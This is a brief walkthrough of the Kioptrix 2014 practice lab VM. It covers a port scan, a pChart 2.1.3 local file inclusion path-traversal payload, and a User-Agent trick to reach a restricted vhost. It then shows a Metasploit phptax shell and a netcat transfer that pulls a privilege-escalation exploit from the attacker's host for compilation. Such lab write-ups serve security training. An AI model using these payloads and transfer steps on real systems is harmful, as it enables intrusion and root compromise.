Kioptrix 2014

Questions: teh3ck [at] gmail [dot] com

Port Scan

Nmap scan report for 192.168.1.87
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
8080/tcp open http-proxy

Source code of index.html

pchart

Local File Inclusion:

/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

Log files:

ErrorLog "/var/log/httpd-error.log"  
CustomLog "/var/log/httpd-access.log"


SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>  
    DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">  
    Options Indexes FollowSymLinks
    AllowOverride All
    Order allow,deny
    Allow from env=Mozilla4_browser
</Directory>  

Changed User agent to Mozilla/4.0 Mozilla4_browser

phptax

msf

options

shell

interactive shell
/bin/sh -i

Privilage escalation exploit

http://www.exploit-db.com/exploits/28718/

Transferring the spl0it

Kioptrix Machine
$ nc -nv 192.168.1.88 10000 >r00t.c

Attacking machine
cat r00t.c | nc -l 192.168.1.87 10000

Compiling

gcc r00t.c

W00t

r00ting


Thanks loneferret for providing that awesome challenge and g0tmi1k for hosting it!